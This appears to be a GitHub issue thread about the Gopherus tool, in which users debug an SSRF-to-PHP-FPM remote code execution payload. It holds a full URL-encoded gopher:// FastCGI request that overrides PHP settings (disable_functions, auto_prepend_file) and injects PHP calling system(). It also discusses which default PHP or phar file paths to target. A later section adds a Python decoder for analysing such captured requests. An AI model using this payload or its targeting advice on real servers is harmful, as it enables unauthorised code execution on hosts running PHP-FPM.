Closed mpchadwick closed 5 years ago
Hey, if we wanted to look at the file which doesn't have permissions, then why don't we first get the RCE through the default file location and then try to read the file you want or find the files you want.
@tarunkant what I'm suggesting is that the payload be updated to clear the security.limit_extensions directive.
I believe doing this would remove the requirement to know the location of a .php file on the system.
I've been trying to understand how to edit FastCGI.py to send that directive, but can't figure out how to do it and ensure the FastCGI packets are still valid.
If it helps, I mean something like this:
https://github.com/tarunkant/Gopherus/commit/908d138d149a129f04d239e7d638a5d918124208
Hmm, I figured out the FCGI_PARAMS format; however, it turns out I was mistaken. PHP-FPM will not allow you to set the directive this way...
curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0C%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH63%0E%04REQUEST_METHODPOST%09hPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asecurity.limit_extensions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%02SCRIPT_FILENAMEls%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3F%04%00%3C%3Fphp%20system%28%27/etc/passwd%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
hPassing INI directive through FastCGI: unable to set 'security.limit_extensions'
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8
File not found.
no-%
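A decoder for the raw gopher payload above, as an added example that is not part of Gopherus or of this thread: it splits the URL-encoded bytes into FastCGI records, decodes the FCGI_PARAMS name/value pairs, and pulls apart the PHP_VALUE string so you can see exactly which INI settings a captured request tries to override, and why PHP-FPM answered with "Primary script unknown" (SCRIPT_FILENAME is ls, which has no .php extension and so is rejected by security.limit_extensions). SAMPLE_PAYLOAD is the string from the curl command; the function names and the findings() checks are mine.

```python
"""Decode a captured gopher:// FastCGI payload into records, params and
PHP_VALUE directives. Added example (not Gopherus code); record and
name/value layouts follow the FastCGI 1.0 specification."""
from urllib.parse import unquote_to_bytes

# FastCGI record types from the specification
FCGI_BEGIN_REQUEST = 1
FCGI_PARAMS = 4
FCGI_STDIN = 5

# Everything after "gopher://127.0.0.1:9000/_" in the curl command above.
SAMPLE_PAYLOAD = (
    "%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00"
    "%01%04%00%01%01%0C%04%00"
    "%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20"
    "%0B%09REMOTE_ADDR127.0.0.1"
    "%0F%08SERVER_PROTOCOLHTTP/1.1"
    "%0E%02CONTENT_LENGTH63"
    "%0E%04REQUEST_METHODPOST"
    "%09hPHP_VALUEallow_url_include%20%3D%20On%0A"
    "disable_functions%20%3D%20%0A"
    "security.limit_extensions%20%3D%20%0A"
    "auto_prepend_file%20%3D%20php%3A//input"
    "%0F%02SCRIPT_FILENAMEls"
    "%0D%01DOCUMENT_ROOT/"
    "%00%00%00%00"
    "%01%04%00%01%00%00%00%00"
    "%01%05%00%01%00%3F%04%00"
    "%3C%3Fphp%20system%28%27/etc/passwd%27%29%3B"
    "die%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E"
    "%00%00%00%00"
)


def parse_records(data: bytes):
    """Split a byte stream into (type, request_id, content) FastCGI records.
    Header: version, type, requestId(2), contentLength(2), paddingLength, reserved."""
    records, pos = [], 0
    while pos + 8 <= len(data):
        rtype = data[pos + 1]
        request_id = int.from_bytes(data[pos + 2:pos + 4], "big")
        content_len = int.from_bytes(data[pos + 4:pos + 6], "big")
        padding_len = data[pos + 6]
        content = data[pos + 8:pos + 8 + content_len]
        if len(content) != content_len:
            raise ValueError("truncated FastCGI record at offset %d" % pos)
        records.append((rtype, request_id, content))
        pos += 8 + content_len + padding_len
    return records


def _read_length(buf: bytes, pos: int):
    """Name/value lengths are 1 byte, or 4 bytes with the high bit set."""
    if buf[pos] < 0x80:
        return buf[pos], pos + 1
    return int.from_bytes(buf[pos:pos + 4], "big") & 0x7FFFFFFF, pos + 4


def parse_params(content: bytes) -> dict:
    """Decode the name/value pairs carried in an FCGI_PARAMS record."""
    params, pos = {}, 0
    while pos < len(content):
        nlen, pos = _read_length(content, pos)
        vlen, pos = _read_length(content, pos)
        name = content[pos:pos + nlen].decode("latin-1")
        pos += nlen
        params[name] = content[pos:pos + vlen].decode("latin-1")
        pos += vlen
    return params


def parse_php_value(value: str) -> dict:
    """PHP_VALUE is newline-separated 'directive = value' lines."""
    directives = {}
    for line in value.split("\n"):
        if "=" in line:
            key, _, val = line.partition("=")
            directives[key.strip()] = val.strip()
    return directives


def analyze(url_fragment: str) -> dict:
    """Decode a gopher payload and summarise what it asks PHP-FPM to do."""
    records = parse_records(unquote_to_bytes(url_fragment))
    params, stdin = {}, b""
    for rtype, _, content in records:
        if rtype == FCGI_PARAMS and content:   # empty PARAMS record = end marker
            params.update(parse_params(content))
        elif rtype == FCGI_STDIN:
            stdin += content
    return {
        "record_types": [r[0] for r in records],
        "params": params,
        "php_value": parse_php_value(params.get("PHP_VALUE", "")),
        "stdin": stdin,
    }


def findings(result: dict) -> list:
    """Points an analyst would note when reviewing such a captured request."""
    notes = []
    if result["php_value"]:
        notes.append("PHP_VALUE overrides: " + ", ".join(sorted(result["php_value"])))
    script = result["params"].get("SCRIPT_FILENAME", "")
    if not script.endswith(".php"):
        notes.append("SCRIPT_FILENAME %r has no .php extension; "
                     "default security.limit_extensions rejects it" % script)
    if result["stdin"].lstrip().startswith(b"<?php"):
        notes.append("STDIN carries PHP source (auto_prepend_file = php://input pattern)")
    return notes


if __name__ == "__main__":
    summary = analyze(SAMPLE_PAYLOAD)
    print(summary["record_types"], summary["params"], summary["php_value"], sep="\n")
    print("\n".join(findings(summary)))
```

Running it on the thread's payload lists four records (BEGIN_REQUEST, PARAMS, the empty PARAMS terminator, STDIN), the eight parameters, and the four INI overrides packed into PHP_VALUE; the same decoder works on any FastCGI stream recovered from a proxy log or packet capture.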
Hey, your payload is incorrect because in the place of FILE_NAME you wrote ls and in the place of COMMAND you wrote /etc/passwd.
And are we able to disable security.limit_extensions (I think not)?
Btw, you can put the file name /etc/passwd, but it's preferable to put a .php extension file (btw, I did put one default file, which will always be there if PHP is installed).
@tarunkant thanks for all the follow up here. Just to note, it's not true that /usr/share/php/PEAR.php will always be present (which is why I was seeing if it's possible to use a file that isn't .php by modifying the security.limit_extensions directive).
[vagrant@localhost magento-1-14-4-0-ee]$ stat /usr/share/php/PEAR.php
stat: cannot stat ‘/usr/share/php/PEAR.php’: No such file or directory
[vagrant@localhost magento-1-14-4-0-ee]$ which php
/usr/bin/php
Unfortunately, as far as I can tell PHP-FPM does not allow changing security.limit_extensions this way.
Turns out the file is present on my system, just in a slightly different location: /usr/share/pear/PEAR.php
Cool, you can also check with /etc/passwd, it will work.
You're right. It does work for me.
There's a good chance of finding phar files in standard locations according to their installation guides.
E.g.
Currently I get the error below when trying to use it with /usr/local/bin/composer